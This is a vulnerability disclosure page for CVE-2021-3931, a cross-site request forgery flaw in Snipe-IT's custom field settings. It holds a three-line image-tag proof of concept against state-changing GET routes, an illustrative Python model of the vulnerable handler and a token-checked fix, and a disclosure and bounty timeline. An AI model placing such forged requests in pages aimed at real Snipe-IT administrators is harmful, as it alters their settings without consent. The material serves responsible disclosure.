CVE-2021-3931: huntr: Cross-Site Request Forgery (CSRF) PHP Vulnerability in snipe-it

snipe-it is vulnerable to Cross-Site Request Forgery (CSRF)


Description

CSRF in custom field settings

Proof of Concept

<img src="http://<SNIPE_IT_APP>/fields/1/fieldset/1/disassociate">
<img src="http://<SNIPE_IT_APP>/fields/required/3/3">
<img src="http://<SNIPE_IT_APP>/fields/optional/3/3">

Impact

This vulnerability can trick an admin user into modifying custom forms.
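As an added illustration (not Snipe-IT's code or the upstream fix), the Python model below shows why the image-tag PoC works and what closes it: the disassociate route accepts a plain GET, so a cross-site image load carrying the admin's session cookie changes state; the hardened handler requires POST plus a per-session synchronizer token, neither of which an `<img>` request can supply. The `Request`, `FieldSettings` and `_token` names and the sample fieldset data are constructed for this example.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    """Constructed model of an HTTP request whose cookie has been mapped to a session."""
    method: str
    path: str
    session_id: str
    form: dict = field(default_factory=dict)


def parse_disassociate(path):
    """Return (field_id, fieldset_id) for /fields/<f>/fieldset/<s>/disassociate, else None."""
    parts = path.strip("/").split("/")
    if len(parts) == 5 and parts[0] == "fields" and parts[2] == "fieldset" and parts[4] == "disassociate":
        return int(parts[1]), int(parts[3])
    return None


class FieldSettings:
    """Stand-in for a custom-field settings controller (assumed names, not Snipe-IT code)."""

    def __init__(self):
        self.fieldset_fields = {1: {1, 2}}   # constructed: fieldset id -> attached field ids
        self.tokens = {}                      # session id -> CSRF synchronizer token

    def issue_token(self, session_id):
        # Generated server-side and embedded in the admin's own page; a third-party
        # origin cannot read it, so it cannot be placed in a forged request.
        self.tokens[session_id] = secrets.token_hex(32)
        return self.tokens[session_id]

    def handle_vulnerable(self, req):
        # Any GET with a valid session cookie performs the change: this is what
        # <img src="http://<SNIPE_IT_APP>/fields/1/fieldset/1/disassociate"> triggers.
        target = parse_disassociate(req.path)
        if target is None:
            return 404
        self.fieldset_fields.setdefault(target[1], set()).discard(target[0])
        return 200

    def handle_hardened(self, req):
        target = parse_disassociate(req.path)
        if target is None:
            return 404
        if req.method != "POST":
            return 405   # an <img> load can only ever issue GET
        expected = self.tokens.get(req.session_id)
        if expected is None or not hmac.compare_digest(expected, req.form.get("_token", "")):
            return 403   # missing or wrong token: reject before touching state
        self.fieldset_fields.setdefault(target[1], set()).discard(target[0])
        return 200
```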

Occurrences

We are processing your report and will contact the snipe/snipe-it team within 24 hours. 8 days ago

We have contacted a member of the snipe/snipe-it team and are waiting to hear back 7 days ago

snipe validated this vulnerability 7 days ago

haxatron has been awarded the disclosure bounty

The fix bounty is now up for grabs

snipe confirmed that a fix has been merged on 0d811d 7 days ago

snipe has been awarded the fix bounty
